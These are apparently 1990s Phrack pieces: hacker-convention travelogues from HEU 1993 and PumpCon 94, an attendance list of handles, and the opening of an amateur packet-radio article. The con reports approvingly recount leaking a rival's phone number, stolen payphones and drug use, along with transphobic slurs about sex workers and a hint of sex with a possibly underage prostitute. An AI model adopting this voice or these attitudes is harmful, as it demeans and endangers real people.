that's the only frequency block that is legal everywhere for this type of application. Sometime later Bill SF was to give a phone phreaking tutorial. He trudged off in the woods to hold a secret workshop. Unfortunately, I wasn't among the privileged audience members, but I hear rumors that the Demon Dialer is available for sale. Sigh. I have no idea what I did for the next few hours. I think I was abducted by aliens. The final panel of the evening was a social engineering panel being led by The Dude. Let's just say that a European idea of what to use your bullshitting skills for is a little bit different than that of your American hacker. The Dude offered advice like "Say you are with the news or a tv star and maybe they will give you a guest account," or "Once I called up and said I was doing a story, and they told me information about their computers." WOW! Pretty radical stuff. I remember a certain boy holding up a 7-11 by phone. I remember someone turning my phone into a payphone by bullshitting an idiot at the switch. I remember people getting root passwords from system admins by social engineering. Where were Chasin, RNOC & Supernigger when you needed them? These are the true greats. I don't know what these people at HEU were all excited about, but they all loved it. Ahhh, ignorance IS bliss. After dark for some reason we were all drawn once again to the quarters table. It was brutal. They ran out of glasses. We made pyramids with the empties. We played chandeliers. We belched, we hollered, we were manly men doing manly things, and we mocked those playing computer games just a few yards away. We laughed at them with manly laughs. And I don't think anyone threw up that night. We got a ride home that night from The Key. He never took off his glasses. There are no lights along the highways in Holland. Luckily I was drunk, or I would have been scared shitless. The final day of the conference we arrived in time to see the "hacking and the law" panel. Emmanuel Goldstein, RGB, Rop, Ray Kaplan, Wietse Venema, Andy from the CCC, a Dutch CERT guy and a few others were on the panel. It started very well but went sour quickly. It was supposedly being moderated by this asshole of a journalist who apparently didn't understand what it meant to moderate. He would answer EVERY question addressed to the panel, whether or not he even knew what the question was about. This shithead gave journalists a bad name. Finally this guy got so annoying that I finally got up and left. We decided not to hang out for the party at the end of time. We figured that the party would be much more fun in Amsterdam, so we cut out. It was time to get into the city and cause problems. EB's Handy Travelling Tip #5: Don't buy drugs in other countries. Drugs are illegal in Holland, despite what everyone says. Despite this fact, they are plentiful and every swinging dick on the street has a few pills or joints to sell you. Now the way I looked at it, why in the world would you go a zillion miles away to see another country and spend your time wasted? It reminded me of walking in the Height after dark, or going down the Drag in Austin a few years back. Every three steps we took in Amsterdam, some joker would run up and say, "You want good smoke? Ecstasy? Cocaine? You want good coke? How about some good hashish?" I should have asked for DMT, but I just blew everyone off. On top of all this, there are like 5 or so bars in Amsterdam that actually sell hash in the bar. They are very easy to spot. They are the ones with the pot plants in the window and the tell tale dope smell permeating every pore of your body when you walk past. The big ones are the Bulldog and High Times. Save your money for better things, like t-shirts or smut. At the con, several people were selling "Space Cakes" which were essentially hash brownies. If you've never eaten dope, you might not like it. It comes on slower, lasts longer, and generally puts you to sleep. This was not what I'd want at a Hacker Con. We needed stimulants, damnit! I drank lots of jolt instead. EB's Handy Travelling Tip #6: Go to the Red Light District in Amsterdam. Even if you are too cheap (or too moral) to shell out the 25 bucks, you should go check out the Red Light District. Be forewarned, all those people who tell you that the women are all "so fine" are either fucked up or have bad taste. In the Red Light area the women hang out behind windows in their underwear and try to coerce you into sleeping with them by taunting you, flashing you, or making other sexual innuendoes. Unfortunately, the vast majority of these "women" look like out-takes from "The Crying Game." We are talking adam's apples and big hands here. Large boned Asian creatures that scared the shit out of me. These things were NASTY. Mr. Miracle, Wim and I must have walked around for an hour looking for decent women. Finally we came across two. TWO. Out of hundreds, there were two. One was a tall blonde in her twenties. One was a short, tan brunette who looked, uh, young. 17:10. I'll spare you the details. Let your imaginations run free. EB's Handy Travelling Tip #7: There's no place like home. I was very happy to hop on that plane back to the USA. As much as I hate to admit it, I really wouldn't know what to do with myself if I didn't live in America. Maybe an England or Australia trip would have been totally different. It really sucked not being able to speak the language. I also got real tired of trying to find food I could eat. [I gave up red meat almost a year ago, and Europeans LOVE THEIR MEAT. Trying to find chicken was a nightmare. The Dutch word for chicken is KIP. Remember that.] The TV sucked, there weren't really any good places for live music, the women weren't interested in a scummed-out, long-haired American tourist and I missed my cat. I met some really cool people and had a blast for the week I was there, but I was real happy to land in the USA. *Epilogue* EB's Handy Travelling Tip #8: If you think customs is going to search you they won't. Me, being stupid, left all my good smut in the Netherlands because I was afraid I'd get arrested for it. I envisioned the conversation. "What are you doing with all these nasty things, boy? You are one sick fucker! Lookie here Bob, this here hippy has pictures of gals a pissin' on one 'nuther." So what happens? They smile and wave me through. Fuck. ******************************************************************************* Hacking at the End of the Universe by Nimrod Kerrett, zzzen@math.tau.ac.il "A Techno-Anarchist Convention" -- August 3-6, Larserbos, HOLLAND. The announcement in Computer Underground Digest committed its viral act, erasing all the neatly ordered schedule entries for the first week of August from my old, grey memory cells, to be replaced by a neon light flashing "You deserve a vacation in Holland." Away we went... Most of us European/Third-World dwellers don't get to see much of the physical manifestations of Gibson's self-executing prophecies. OK. The Matrix is there, but to witness street-culture one must live in San Francisco or somesuch. HEU -- Hacking at the End of the Universe -- looked like the only chance to surface on the physical side of a phone plug and experience cyber-culture in form of faces, fashion and body-lang. How naive I was to presume this. Compared to most of the kids there, I looked dangerous (a timid, Swiss-bank sysadmin)... But don't get me wrong, I DID have fun -- failing to do so in Holland requires quite a unique body-chemistry -- but I had a nagging feeling that European hackers still live in the Seventies. First, A Few Positive Notes The most important lecture addressed electronic money. I won't go into sci.crypt-style details, but this was the most exciting thing I've ever heard since public-keys were first explained to me. The president of a Dutch firm called DigiCash described a crypto scheme where a bank can issue electronic credit-certificates which can't be forged, and yet are immune to traffic analysis. Their digital cash is just like physpace cash: it has no smell. You get a "virtual $100 bill" from the bank that you can't forge or spend more than once, and which the bank can't trace -- e.g. to the specific person who requested it. Ever since society devolved from cash to credit cards, people have become used to the idea that our shopping-histories are readily subject to electronic surveillance. At HEU I learned this was all hype: we CAN evolve economic systems to enjoy advantages of digital communication without sacrificing our privacy. Another interesting issue was a lecture by an ex-CIA executive who went private [ed. note: positively identified as a net.personality on the WELL] and now tries to preach for open-source approaches: instead of creating your own locks and picking the ones of your neighbor, the idea is to use information-gathering/analysis techniques -- one of those things in which "intelligence" bodies specialize -- to derive content from the info-swamp we seem to be sucked into... and then sell it. This guy made arguments similar to what Barlow said before the hush-hush community a few months ago, but seems to refocus everything on enterprise. Mighty exciting. BTW, I've noticed how the concept of profit makes bleeding-heart European anarchist types wince... The network built onsite also impressed me. In a campground setting, subject to occasional rainstorms, they erected three LANS connecting nearly 100 computers of all sizes and shapes, plus terminal servers for the Etherless. Computers were placed in our private tents, and the field bloomed with PC/XTs-turned-repeaters covered in wet plastic sheets. This monstrosity connected to the Internet over three shaky SLIP dial-up lines and it actually WORKED -- it cost some sleepless 36 hours, but still, WOW. Switch To Poison Ink Hacker (n) -- (1) One who derives pleasure from making systems do things they're not supposed to do. (2) A nerd who does word-processing in hexadecimal, is allergic to color or windows and hates being called a "user" in ANY context. Most of the hackers I met at HEU fell under the second definition. I was even scolded for using "Wintendo" and wasting the precious power of my 486 notebook. Let's start with the local network -- having all the tents connected was a wonderful idea, and symbolized constructive techno-anarchy. Unfortunately it lacked cultural content. To begin with, you had to login as a guest -- if you'd figured out the IP number of a server working at the moment. You had no identity handle, so there was no use in talking about site-specific newsgroup for follow-ups on topics. Even local email was impossible; to whom would you email? Since everyone got a badge on entrance, why didn't we also receive user-ids, perhaps written on the badges? Even administrative announcements (e.g. schedule changes) were only available on a PHYSICAL bulletin-board in the bar... ever tried to scan manually over 200 paper scraps? Another side effect was that to justify dragging your portable all the way to Holland, you just HAD to hog the SLIP lines and telnet outside, which made life hard for all of us, but much harder for the networking crew. In my humble opinion, excessive telneting is like saying "Nothing to do here, let's try somewhere else." I LIVE somewhere else; I took a plane in order to check out THIS place. Telneting was also a problem since the IP-resolving system didn't work and we had to apply hacking techniques to find the IP numbers back home. The most frustrating thing was the social/political discussions. In a discussion titled "Networking For The Masses" someone dared suggest user-friendliness as a key to resolving computer illiteracy. "No shit, Sherlock" -- I hear you mumble. Well, here's how another panel-member replied: "A revolution is not a user-friendly thing. Activists shouldn't count on the computer community to make stuff easier for them". Watch out, masses... prepare for computer military-training once the Revolution is over. Let's take another trendy political subject -- cryptography. One would assume that any techno-anarchist convention in '93 would feature a nice level of heated, political, crypto-discussion. Well, nada. The only crypto-related subject was the "electronic cash" mentioned above. Although it's quite exciting for the crypto-enlightened, 90% of the HEU audience lost contact after the first three cube-roots, returning to their tents to telnet elsewhere. I was left in a small group of highly-technical Cypherpunks who didn't give a fork whether New Delhi housewives would ever understand the switches of PGP; they seem to ENJOY their wizardly "elite" status. Even in discussions about hacker-paranoia, the audience disliked the idea of demystifiyng the almighty-hacker image to make your average, trigger-happy policeman relax a bit. Does Europe need an equivalent of USA's "Operation Sun-Devil" to knock sense into its collective skulls? FTP to ftp.eff.org:/pub/cud/papers/crime.puzzle to learn from the bitter experience of others (I don't know the IP number!). Epi-Travel-Log Before the convention, I naively believed that at least the HACKERS could Read the Writing on the Wall... Since I'm sober now, I'll spell it out for you: When the world finally adopts strong public-key cryptography (I hope it does, since I've seen too many wars and acts of human-rights infringement in my life), two things will become virtually impossible: 1) seeing what you're not supposed to see; and 2) changing what you're not supposed to change, unless you want to cause brute-force damage. These two anachronistic activities represent the basis for most hacker-culture I encountered at HEU -- so my advice is: switch to the first dictionary-definition of "Hacker". Try being less techno and more anarchist. There's a revolution going on... in case you've missed out on some Usenet recently. ---- Reprinted from Fringe Ware Review #2, ISSN 1069-5656. Published by FringeWare Inc., fringeware@illuminati.io.com Copyright (C)1993, Nimrod Kerrett. All rights reserved. ******************************************************************************* Hackers Play The Field July 26, 1993 ~~~~~~~~~~~~~~~~~~~~~~ (Newsweek) (Page 58) [A Newsweek reporter packs for, and dreams about, HEU in the Netherlands. As you can tell, it was written before the actual con] There's no guarantee of a large turn-out, but if thousands show up, it may help demonstrate how far hacking has moved out of the bedrooms of smelly adolescents. If so, there's likely to be less geeking and more dancing in the Dutch summer night. Programmers may one day be able to lean back from their terminals, pat their pocket protectors and say, "I was there." ******************************************************************************* A Woodstock For Hackers and Phreaks August 16, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Barbara Kantrowitz and Joshua Ramo It was billed as "Woodstock for the Nintendo Generation" The techno-freaks who gathered at the Hackers at the End of the Universe in the Netherlands last week had at lease one thing in common with their '60s counterparts: they believed rules were made to be broken. Some were there only electronically, communicating through networks around the world. The rest--the vast majority of them males in their late teens and early 20s--gathered in hundreds of multicolored tents clustered around power outlets and portable toilets in an area the size of six football fields. Many had computer terminals in their tents, with the monitors nestled between sleeping bags and guitars. No one was surprised by the white van bristling with antennas that trolled up and down the road leading to the campground. Everyone seemed to agree that it belonged to the Dutch Secret Service; everyone also assumed the meeting was being monitored by the CIA and Britain's MI6. But no one knew for sure; paranoia is popular among hackers. ******************************************************************************* Pump Con 94 "The Legacy Continues" by Erik Bloodaxe Travelling sucks most of the time. People like to glamorize it as if it's some kind of status unobtainable to the "Average Joe" but nine times out of ten its just a pain in the ass. My trip to Philadelphia for the second PumpCon fell well within the aforementioned nine of ten. I was sick as a dog, coughing up large blood-soaked clots of phlegm at a steady pace. This was either due to some undetected immune system failure or due to my previous weekend's fiasco which dealt with chemical overindulgence, alcohol abuse and some kind of strange creatures that tried to pass as female...but that's another story. (We will assume that my ill-health stemmed from the latter.) I showed up at the Comfort Inn to find a lobby full of what had to be conferees. (They had been saying to many people they were "Campus Crusaders for Christ.") After checking in I stumbled over to the group to see who was who. I introduced myself and asked if Dr. Who or Mark Tabas had showed up. They had not. (And as it turns out, they would never show up. Dr. Who I can forgive since he had no way in from Boston, but Tabas...obviously he had better things to do than drive a few miles across town to say hello. Remind me to reciprocate at HoHo Con.) I was immediately pulled away by GrayAreas and Ophie, who both bestowed upon me warnings of impending doom. Ophie relayed that The Wing had told her the previous night that he was going to come to the con and "get me." GrayAreas informed me that an unscrupulous character had been asking for me earlier. After she described him, it was obvious that Rogue Agent had made it to the con. (Unscrupulous...haha) Up in my room, I dove into my bag of medical goods and felt pity upon myself. Congested, contagious, feverish and now being stalked by some unknown person. Great. I never much paid any heed to the threats given by unknown typists over the net, as people's bravado multiplies exponentially in direct proportion to the distance they are separated behind a phone or computer screen. During the week prior to the con I had been threatened by at least 2 different people under a variety of nicks and addresses. One promised to crack me over the head with a bat. I figured with my luck, being sick, this would be the ONE time someone would make good on such a promise, as my timing and coordination would obviously be impaired. Swell. I went on back downstairs to jump in the conversations in the lobby. The group had grown a bit in my absence. I sat down and began talking to Shortwave & C-Curve about ham radio and archaic computer equipment. Shortwave offered to send me a Commodore PET to add to the Erik Bloodaxe Memorial Computer Archive. (The EBMCA is a non-profit organization devoted to maintaining the history of personal computing. Our museum will open soon. Hold your breath!) I then noticed that it appeared that damn near every IRC denizen from the Washington DC area was at this damn con. (sans KL & Strat, but they were to appear the following day.) A bunch of us took off wandering around later on to see what the hell was up at some of the other hotels. The area was laid out in such a manner that there were like five hotels immediately next door to one another with two cheesy restaurants between them. We took off to the Knights Inn and ended up hanging out in the parking lot staring at the moon, bullshitting about really lame stuff. While hanging out like retards in the near freezing winds, Dark Tangent came over and told us that Zar had been thrown off a bus for the 2nd time and was stuck in DC and needed someone to pick him up. No one wanted to road trip it to DC since we were all having SOOO much fun freezing our asses off, so Zar had to wait it out for the next bus. In one room in the Knights Inn a bunch of people were busily smoking their brains out. Their little gathering was dubbed "Hemp-Con." Finally, sanity rested upon me and I decided that the cold would not help nurse me back to health, so I took off back to my room. Ophie was in the room next door to mine with a bunch of people drinking. Well, I think Ophie was doing most of the drinking actually. :) I wandered in and gave her a hard time about being drunk. She responded by telling everyone in the room intimate details about her marriage and her sexual involvement with the entire DC hacker scene. Then she took off all her clothes and ran around throwing Miniature chocolate bars at everyone. I'm making this up, but she probably wouldn't remember. it anyway. Hehe. As I went to open my door I noticed that someone had written "DIE NARC" on it with a cigarette. On the floor was the cigarette, a Camel filterless. Well, it appeared that The Wing had arrived. [Oh frabjuous day. Calloo, Callay. I chortled in my joy.] Just as I was about to go to bed, people were banging on my door. When I opened it, it looked as if everyone from Ophie's room had staggered over for a visit. One guy in the back, kinda tall, kinda thin, wearing a purple shirt, was smoking a Camel stub. I smiled a him and said, "How's it going?" He seemed a bit put off but said, "Do you know who I am?" I replied, "Of course I do Alan, how's it going?" This seemed to piss him off for some reason. "You might be all happy tonight, but just wait until tomorrow," he said. "Oh?" I replied, "you got something in store for me? Cool. Could you play those Ken Shulman tapes for the con?" (For those of you who don't know, once upon a time, I had a little company called Comsec. One of my partners was Ken Shulman, a rather complex new money piece of @#!*. Well, things didn't work out with us and Ken for a number of reasons, so we fired him. Ken got mad at us. He tried to fuck over each of us in devious little ways. To get even, I gave his private number out to MOD via the MOD information conduit Renegade Hacker. One day, "little shulow" was called up by Wing and Corrupt. According to several people, this call was recorded by MOD. On this now legendary tape, allegedly a disgruntled Shulman proceeded to tell MOD the story of how we at Comsec were involved in crimes, drugs and were turning in everyone to the feds. This is the same Ken Shulman who lost his BMW to the Houston Police when it was found with 400 hits of X in the trunk, and went into seclusion. But I digress. I've been trying to get a copy of this tape for about two years to see if he said anything actionable about Comsec, and to it give to the FBI if he may have been interfering with an ongoing federal investigation. Yes, I do hate him.) This seemed to make Wing mad too. I guess I might have spoiled the surprise or something. "I'm not gonna play any tapes so you can sue Shulman." "Oh, that's too bad." I said. "Well, I just want you to know, that tomorrow when it happens, you'll know," he said. "Well, I guess we'll just wait till tomorrow then." "Yeah, we will." "Yup. I guess we will." "You think you're so cool, but YOU'RE A DICK!" he screamed. Oh great, this is where I get punched. "Well, it's nice you have your opinions." "YOU'RE A FUCKING DICK!" Maybe I was supposed to be the one getting mad and doing the punching but I wasn't getting anything but tired and was ready to take a shitload of aspirin and slam a bottle of night-time cold syrup and antibiotics. "Well, I'll see you tomorrow." By now, I guess everyone had figured out that there would be no bloodsport, so someone grabbed Wing and they left. Ophie yelled after him, "Some people are such assholes." "Well, wasn't that fun," I said to those still hanging around. "But, alas, time for me to get some sleep." I went down to bum some aspirin from Noelle and told her the sordid tale, then went back to my room and crashed out. AND THAT'S THE INFAMOUS ERIKB vs THE WING STORY. AREN'T YOU EXCITED? That night, VaxBuster and others tried to get in the electrical box, but were thwarted by a concerned citizen. "I'M GOING DOWN TO THE FRONT DESK RIGHT NOW!" Meanwhile, Sabre sat in the cold all night drinking himself into oblivion while keeping a sharp, albeit bloodshot, eye out for potential feds. The next day everyone congregated in a room at the Red Roof Inn that had been rented as the Conference Room. (How crafty, we'll have it in a hotel room, and SAY its a conference room.) Everyone piled into this room anxious for everything to begin. We waited. And waited. And waited. Several newcomers had arrived such as Strat and his woman, Dr. Freeze (who used to be the Wizard 703 of rolodex fame. Keep on Phreakin!), and Zar who had arranged to get kicked off of his 3rd bus right near the hotel by slamming a 40 and lighting up cigarettes right next to the bus driver. Finally, after about 7 hours, I figured that maybe I should just go say something. I hopped up and gave a quick and dirty overview of commercial packet radio technology. I talked briefly about RadioMail and CDPD, and also talked about EMBARC and demonstrated sucking messages out of a Newstream pager. Then I sent a message from my notebook from ARDIS to a Sprintnet gateway, thru an outdial to a dialup to a terminal server on the Internet, and from one account mailed myself at RadioMail which then sent it back to me on my HP95 over RAM. I dunno...I thought it was cool. After speaking, I was presented with an award: an empty porno video box. The buttheads didn't even have the decency to give me the tape! I put the bible in it instead and placed it back in a drawer. GreyAreas got up next and talked a bit about her magazine and then in a heartfelt plea, asked whoever was bothering her to stop. Many in the audience seemed indifferent to her cause, which upset her greatly. She had to leave immediately afterwards. I hope I wasn't the only person who felt kind of sorry for her. Now, I'm not one to rain on anyone's parade, but kids, fun and games on the net are one thing, but the minute you start fucking with people's businesses they will go to the FBI. Remember this. [Personally, I think there are about 4 or 5 specific people on the net who need to fucking grow up before they find themselves sharing a cell with Phiber, although that seems to be what they want.] To be fair, people who decide that they want to get on the net need to be reminded that THE NET IS NOT REAL! THE NET IS NOT REAL LIFE. IF THE NET SCARES YOU OR WORRIES YOU, TURN OFF THE FUCKING COMPUTER! GO HANG OUT ON ANOTHER CHANNEL! GO PLAY ON A MUD! GO READ NEWS! If that doesn't placate you, go to AOL. Next up was someone I didn't know, and unfortunately didn't meet. But his girlfriend was HOT! [If he's reading this, tell her I said "hi."] He gave everyone a rundown of the troubles from last year's Pumpcon. I noticed during his recap that the trouble last year didn't really start until they all read The Visionary's file. I suggested that we hold a midnight seance and read it aloud so we could all get busted too. Ixom finally made it to his own con and said a few syllables about the folks still waiting to be sentenced from last year. Up last was VaxBuster who talked about the wonderful world of Blue Boxing. Yes, Virginia, there is a way to box. People are so silly. Obviously I'm not the only one who has looked at CCITT manuals and knows signalling frequencies in other countries, or who knows about the "International Direct" numbers. Wow. After the conference several of us had pizza and got the worst service I have ever had in my entire life of dining out. Grand. We made up for it by amusing ourselves spotting "victims" with laser pointers, laughing like idiots as we placed the dots on their foreheads. Once we got back from chowing, everyone had already begun drinking. People were going off to congregate at the conference room for a central party location. As I was leaving to go over there, The Wing walked up to me, and said he needed to talk to me. We went into my room and he said he had heard what GrayAreas said earlier in the day, and he wanted to say that it wasn't him. I told him, he needed to tell her that, and not me. I went on to tell him that if he wasn't involved in all the crap going on all over the net, then I had no problems with him. I said he had some really poor choices in friends in the past, but hopefully he would exercise better judgement in the future. We all went back over to the conference room. Wing pulled GrayAreas outside to talk to her. While they were talking, I caught some talk about payphones. [no names from here on] It seems this guy had a lot of phones and several people too off to go buy a few. They ended up at the lamest party in Pennsylvania. Four people and a keg. The phones allegedly were sold for 75 bucks and were still in the box. Brand new. Back at the con, one of the hapless phone buyers decided to take his phone up to the conference room to show it off. Once there, everyone giggled and gawked over it, and then he took it back down to put it in a car. On the way there, a cop grabbed him and arrested him. The cop then searched the car he was about to put it in and found some pot and arrested the car's owner too and had the car impounded. [anonymous portion ends] Now the cops converged on the conference room and began hounding people in there. One wonderful cop discovered my Porno-Bible creation and screamed at the crowd, "You heathens! How could you do something like this? You people are sick!" Ixom, ready for a fight, began yelling at the chief of police over the phone. The police chief told him that maybe he would like for the nice officers to bring him downtown to go over his complaints. Ixom decided that would not be necessary. After the police interaction, people scattered from the conference room back to their individual rooms. No sooner than they got there, the police decided to investigate a "few noise complaints" at the Comfort Inn. Ophie's room, the Dope Room on the 1st floor and a few others got searched. While all of this mayhem was ensuing in the outside world, I was up in my little room being interviewed by GrayAreas for her magazine. This was probably the longest interview I've ever done. I hope I don't turn out looking like a bigger fuckhead in it than I already am. After the interview, I got the story of all the police interaction from the throngs of people who gathered outside my room. A few people remarked, "how come YOUR room didn't get searched?" I didn't have an answer for that, except maybe because it was paid on a corporate AmEx and might not have looked like a "hacker" was in there. (No, it was because I work for the government...just ask Agent Steal. Geez.) After this mess I went to bed. Yup. The following morning while waiting to get a table at Denny's, we noticed that the old dudes with the beer were going into the "conference room" and taking stuff out. A bunch of the crew ran over there to check it out and guess what? The old guys weren't just any bunch of drunken old dudes, they were the Pennsylvania State Police's Computer Crime Division. They had been staking out the conference from the room next door and had listened in to everything. Rad. Two years and running. Maybe next year the CIA and NSA will want to stake it out too. I can't wait. Then I went home. ******************************************************************************* - Top 10 things learned at PumpCon - - The Wink - 10) Hotel's don't like over 40 people in their lobby 9) Its not Ma'am, its Doris 8) "GrayArea has quite a few gray areas" 7) Greyhound hates Zar 6) Who needs speakers who show up? 5) SnatchBuster ! 4) "You heathens, how can you put the Holy Bible in a pornographic movie case !" 3) Geezer Narc ! 2) Don't put condor and erikb in the same space 1) Don't carry open payphones around the con ******************************************************************************* P U M P C O N ][ Informal Attendance List I cranked this thing out over the weekend, and some people I know were there, but I didn't get their names. Some people might be listed twice. It's up to you to figure it out. As we were waiting for people to arrive we came up with a lameness scale. If you got a "+l" that mean you got a lame point for saying someone's real name or info. Basically spouting off real stuff to people who shouldn't hear it. Sure it's easy when you all know each other, but if I was really trying I would have generated so much real data on people it would be scary. On the other hand if you were real slick and tricky, you got a "+e", or elite point. As more and more people showed up I stopped doing this 'cuz we all broke up and only the people I was around would have to suffer the wrath of the +l. Think of it as a security rating. The more +l the easier it was to get info out of people. The List is in the order of when I ran into people. Basically the first half is in chronological order, but after that I lost track and got names when I could. Grayarea Noe11e (Yes, she exists) Okinawa (+e) Reive (assigned to Fed-Man) Ophie (+l+l+l+l+l+l.. you get the idea) Lgas (+l) Loki (+l, but he was trying hard..) Jello Man Evak CarlCory SubEthan (+l) Bernie S. (+l, Elite handset dude) Jamie DRobinson iXom (5 hours late) Nick-O (+e, worked that stewardess) FreeJack MadCap (With the elite hat) Condor Jay Farnam ShortWave ErikB (+e, good speech) C-Curve (+e) Cuttle Fish Vax Buster (+e+e for protecting personal data, Good speech) Syntor LudiChrist (+l,+e for evading officers) Optic Nerve Scourge (+l) Great One (+l, +e for staying cool at police station) Dave (+l+l, Don't use your real name) Phil (+l+l, what's this, Real Name con?) Juanka (+l This guy was acting strange..) Rogue NtStriker (+e for being shot by the police) Wierdo DreamScriber Randy S. Hacker (+e for cool car and free beer) Count Zero Typhoid Mary (She locked onto TaquilaHeadPaint) Ragent The Wing Stranger (+l for believing NtStriker was shot) RedAlert Zar (+l for getting kicked off three busses) Dr. Freeze Strat Anonymous Caller KL (+e for staying at the Knights Inn) Mad Dog Odd Ball Hoog Decimator (+l, real name) Time Lord (+e, good speech) Albatross Saber Tristan Grimm Male Havoc MrG (+l+l for getting arrested, +e for not narking) The Dark Tangent (+l, for making this list) ==Phrack Magazine== Volume Four, Issue Forty-Four, File 9 of 27 **************************************************************************** The Amateur Radio Packet Network by Larry Kollar, KC4WZK ... As a low-orbit satellite comes into range, Jim's system automatically goes into action. The computer downloads the last half of an image taken by the satellite's CCD camera, the first half having been taken on the previous pass. That done, the computer gets a list of new files on the satellite's BBS and downloads Jim's email... It's legal. ... Her mother is on the phone, but Rhonda accesses the local BBS by radio. She logs in to read postings from a world-wide network and her email from a penpal in Great Britain... It's not Internet. ... 11:30 p.m., and the local conference node is jumping. Two people were trying to work out a computer problem, when the local expert checked in with some ideas. Before long, three more people checked in and a freewheeling discussion got under way... It's happening now. While the Internet has been growing fast and with great hoopla, amateur radio operators (or "hams") around the world have been quietly building a network of their own -- the Amateur Radio Packet Network. Like Internet, the packet network has a large TCP/IP component and is available to anyone who can get access. Unlike Internet, getting access is very easy for nearly anyone who already has a ham license. The packet network is rather loosely organized, and is built and maintained by volunteer work. It's basic building block is the LAN (actually a MAN, or Metro Area Network, but terminology is never 100% accurate), which are coordinated by local or regional clubs. A LAN occupies a specific radio frequency (or channel, if you want to be crude about it :-), usually VHF or UHF, within a given area. Individuals and the regional organizations provide links between LANs for communications outside the local area. LAN operations work much like Ethernet -- your radio waits for the frequency to be clear, then transmits a packet. This allows several connections to run at once. Most packet systems can themselves maintain up to 10 simultaneous connections, but this feature is used only rarely. ---------------------- Packet Radio Equipment ---------------------- Hams to want to use packet radio need three pieces of equipment: - A radio (of course). Most LANs are found on the 2-meter band (144-148 MHz, with packet concentrated around 145.0 MHz and 145.6 MHz. Many hams dedicate older crystal-controlled commercial or ham radios to packet work. - A TNC (Terminal Node Controller). This is an intelligent box that contains a packet modem much like the guts of a landline (telephone) modem, and a micro- computer that handles the network interface. Other alternatives are available, including a dumb radio modem that plugs into a PC (software on the PC then handles the network interface), and multimode controllers that can handle other digital communication methods popular among hams. However, most hams use TNCs since they are cheap (just over $100) and readily available. - A terminal, or a PC running a terminal or packet program. Since TNCs are smart devices, a simple terminal or terminal emulator is all that's required: if it has a keyboard, a display, and an RS-232 port, you can use it with a TNC. However, many features (multiple connections, for example) are more useful if you have a computer running special packet software. Currently, most hams use 1200 baud on 2 meters. This is the lowest (very) common denominator in packet radio. However, large urban areas are starting many new LANs in the 420-450 MHz amateur band; most of these use 9600 baud as a minimum. As time goes on, and packet radio becomes more popular, 9600 baud will become the entry level. When many inter-LAN links use 56K baud, and some go as high as 2M baud, why are the vast majority of hams still using 1200 baud? Part of the answer is technical: to get reliable performance at better than 2400 baud, you have to tap into the guts of the radio, bypassing the audio stages for both transmit and receive. The other part is social: everybody else is using 1200 baud, why spend extra money for stuff you can't use? The technical problem has been solved -- you can buy "data radios" in kits and pre-built models that come with the audio bypasses already in place -- but it will take a few years or a good reason for hams to abandon their old gear and move up. -------------------- Local Communications -------------------- There is lots of local action to be found on the LANs. People and clubs run BBSes, conference nodes, and many personal mailboxes. Most BBSes are set up so they can send email and specified bulletins (equivalent to Usenet newsgroup articles) to personal mailboxes during late night hours when usage is light. A ham using this setup simply accesses his personal mailbox to get his feed for the day, not worrying about noise and propagation delays. In general, a ham who wants to add a component to a LAN just puts it up and advertises it on the local BBSes. For example, a friend in my area recently set up a "QUOTES" BBS dedicated to sharing quotes and funny stories. Perhaps by time this issue of Phrack is published, I will have a Xenix system available for logins over the air. In most areas, the local networks use AX.25 (a subset of X.25 designed by hams especially for packet radio), although TCP/IP is getting popular in some places. I'll talk more about this later. ----------------------- Linking It All Together ----------------------- A single LAN is useful, but the REAL power comes from hooking them together. Linking LANs into a wide-area network gives the Internet its power; so it goes with the packet network. With inter-LAN links, we can send email nationwide (and to many foreign countries), post articles (bulletins) for general reading, and even make distant keyboard-to-keyboard contacts -- with some limitations. So how is it done? Since many metro areas support a dozen or more LANs, these are usually linked together with high-speed UHF equipment using TCP/IP. An Atlanta-based group called GRAPES has developed a 56K bps system; some experimental links in the microwave bands run as fast as 2 MEGA bps! For long-haul links, many areas rely on HF (shortwave) frequencies. Since the FCC limits HF packet to 300 baud (yes, you read that right -- 300 baud), and the HF frequencies are often very noisy, this is a slow and painful process. The amazing thing is not how slow it is, but that it works at all! For this reason, many forward-looking hams are turning to packet satellites for long-haul links. The advantages include relatively quiet frequencies, 9600 baud data rates, and predictability; the major disadvantage is that there are simply not enough satellites to handle all the traffic that needs to be handled -- yet. I'll talk more about packet satellites later. ------------------------------- AX.25, TCP/IP, and All the Rest ------------------------------- The packet network grew from a handful of different experiments with radio networking, which has left us with several networking protocols. Far and away the most popular protocol is AX.25, which is built into thousands and thousands of TNCs and other packet controllers. AX.25, as implemented in most ham gear, offers up to 10 simultaneous connections and the ability to "digipeat" packets. Digipeating (DIGItal rePEATING) is one way to extend the range of a packet station -- if you can't reach the station you want to talk with directly, you can often digipeat through a station between you and the other person. One problem is that you have to manually construct a route each time you want to contact a distant station. The other problem is that the send-acknowledge sequence has to run all the way across the link. Digipeating through more than one or two stations is a good way to annoy other LAN users, and unreliable to boot. The connection works as follows: ---send---\ /--------> station1 digi station2 <---------/ \-- ack -- One popular improvement on the digipeater is the K-node, developed by Kantronics (a vendor of packet equipment). The K-node establishes two links -- one between you and the node, the other between the node and the other station. Each link has its own send-acknowledge loop, so a problem in one leg of the connection doesn't require re-sending packets through the entire end-to-end connection -- only through the leg where the packet got garbled. This connection works as follows: ---send---\ /--send--> station1 K-node station2 <--ack----/ \-- ack -- The K-node shares one disadvantage with the digipeater -- you still have to manually construct your own connection. This is where the higher-level protocols come in. I've already mentioned TCP/IP. Yes, we have it. The 44.*.*.* network is assigned exclusively to amateur packet operations. The network name is "ampr.org." Since TNCs do not have TCP/IP in ROM, some kind of personal computer is required. Most of them work -- PCs, Macs, Amigas, Ataris all have TCP/IP networking software. If you've ever used the free KA9Q NOS software (or one of its derivatives), you have software that was developed by hams for hams. TCP/IP lets amateurs create all sorts of interesting experiments, such as setting up "wormholes" through the Internet to relay traffic between distant LANs. Some parts of the country have Internet/packet email access as well. There are other "smart" networking protocols in wide use. NET/ROM is one highly popular protocol. Each NET/ROM node keeps a table of nodes heard and how to reach each one, eliminating the hassles of manual routing. One problem with NET/ROM is that during band openings, VHF and UHF signals can carry for hundreds of miles beyond their normal range. ("Line of sight?" Yeah right -- a friend of mine in north Georgia has made contacts with people as far away as Lincoln, Nebraska on 2 meters using the stuff he carries around in his truck.) After a band opening, NET/ROM nodes find themselves stuffed with faraway nodes that they can't hear anymore. The phreakers in the audience may find ROSE interesting. ROSE bases addresses on the NANP area code/prefix scheme. If a person uses ROSE, and you know her call sign and phone number, 